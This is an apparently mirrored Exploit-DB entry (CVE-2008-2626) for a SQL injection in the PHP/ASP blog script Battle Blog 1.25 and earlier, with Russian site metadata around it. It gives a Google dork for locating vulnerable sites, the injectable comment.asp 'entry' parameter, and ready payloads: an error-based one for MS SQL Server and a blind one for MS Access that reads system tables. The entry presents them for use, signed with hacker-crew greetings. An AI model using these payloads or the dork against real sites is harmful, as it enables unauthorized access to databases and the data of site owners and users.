- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5731
- Проверка EDB
-
- Пройдено
- Автор
- BL@CKBE@RD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2626
- Дата публикации
- 2008-06-03
Код:
+************************************************************************************************************************+
| hhh hhh aa ccccccc kk k EEEEEEEE RRRR TTTTTTTT NNN NN |
| hhh hhh aa aa cc kk k E RR R ----------- TT NN N NN |
| hhhhhhhh aaaaaaaa cc kkk EEEEEEE RR R ----------- TT NN N NN |
| hhh hhh aa aa cc kk k E RR R TT NN NNN |
| hhh hhh aa aa ccccccc kk k EEEEEEE RR R TT NN NN |
| |
+************************************************************************************************************************+
[+] Script Name : Battle Blog <= V 1.25
[+] Script In Short: ('Battle Blog's "real world" preview feature allows you to view your posting within the actual context of your presentation and customized style sheet before you've published it, or, while you're making edits to a current entry.');
[+] Found by : Bl@ckbe@rD ('Tunisian TerrorisT') ;
[+] Google dork : "Powered by Battle Blog" ;
[+] Script URL : webscripts.softpedia.com/script/Blog/Battle-Blog--31261.html ;
[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
--//-->
[+] Expl0iT :
/comment.asp?entry={SQL}
-----> For MS SQL Server : 22+and+1=convert(int,(select+@@version))--
-----> For Ms ACCESS (Blind-Way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00
--//-->
[+] GrEEtZ : allah , hak3r-b0y , UnderZ0ne Crew , InjEct0rS Team
# milw0rm.com [2008-06-03]
- Источник
- www.exploit-db.com